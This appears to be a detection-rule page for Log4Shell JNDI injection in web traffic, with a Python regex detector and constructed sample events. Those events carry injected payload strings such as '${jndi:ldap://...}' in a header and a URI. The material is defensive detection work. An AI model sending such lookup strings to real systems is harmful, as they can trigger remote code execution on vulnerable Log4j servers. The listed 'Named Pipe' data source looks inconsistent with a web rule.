
Summary
This detection rule targets attempts to inject Log4Shell JNDI payloads through web traffic by identifying the payload pattern in raw web event data such as HTTP headers. The analytic searches the Web datamodel with regex patterns for strings associated with JNDI lookups, notably those beginning with '${jndi:ldap://'. The rule is critical because it addresses a well-known vulnerability in Java applications that use the Log4j library: a successful injection can let an attacker run arbitrary code and completely compromise the affected system. Any detection therefore requires immediate investigation to determine whether a breach has occurred and to apply countermeasures.
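The following is an added Python illustration of the detection logic described above, not the rule's own search or any code from the content project. It applies the '${jndi:' regex to constructed web events (sample header and URI values, not real traffic); as an assumption beyond the page, the pattern also accepts the other JNDI lookup schemes Log4j resolves (rmi, dns, etc.) and ignores case, since proxies and log pipelines normalise header text differently.

```python
import re

# Regex for the rule's core pattern: a JNDI lookup string such as "${jndi:ldap://"
# inside raw web request data. Assumption beyond the page: besides ldap it also
# matches the other lookup schemes Log4j resolves, and it is case-insensitive.
JNDI_PATTERN = re.compile(
    r"\$\{\s*jndi\s*:\s*(?:ldap|ldaps|rmi|dns|iiop|corba|nds)\s*:",
    re.IGNORECASE,
)


def find_jndi_lookups(fields: dict) -> list:
    """Return [(field_name, matched_text), ...] for every field value carrying a JNDI lookup."""
    hits = []
    for name, value in fields.items():
        match = JNDI_PATTERN.search(value)
        if match:
            hits.append((name, match.group(0)))
    return hits


def scan_web_events(events: list) -> list:
    """Check each web event (dict with 'src', 'uri', 'headers'); return one alert per matching event."""
    alerts = []
    for event in events:
        # Headers and the request URI are both raw request data the pattern is applied to.
        fields = dict(event["headers"])
        fields["uri"] = event.get("uri", "")
        hits = find_jndi_lookups(fields)
        if hits:
            alerts.append({"src": event["src"], "hits": hits})
    return alerts


# Constructed sample events (not real traffic). The first is benign; the second carries
# the lookup in the User-Agent header and the third in the URI, with mixed case.
SAMPLE_EVENTS = [
    {"src": "10.0.0.5", "uri": "/index.html",
     "headers": {"User-Agent": "Mozilla/5.0", "Host": "www.example.test"}},
    {"src": "198.51.100.7", "uri": "/login",
     "headers": {"User-Agent": "${jndi:ldap://lookup.example.test/a}", "Host": "www.example.test"}},
    {"src": "203.0.113.9", "uri": "/search?q=${JNDI:rmi://203.0.113.9:1099/x}",
     "headers": {"User-Agent": "curl/7.88", "Host": "www.example.test"}},
]

if __name__ == "__main__":
    for alert in scan_web_events(SAMPLE_EVENTS):
        print(alert)
```

Each alert names the source address and the exact field that carried the lookup string, which is the first thing an analyst needs when triaging a hit.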
Categories
- Web
- Cloud
- Application
- Endpoint
- Infrastructure
Data Sources
- Named Pipe
ATT&CK Techniques
- T1190
- T1133
Created: 2024-11-15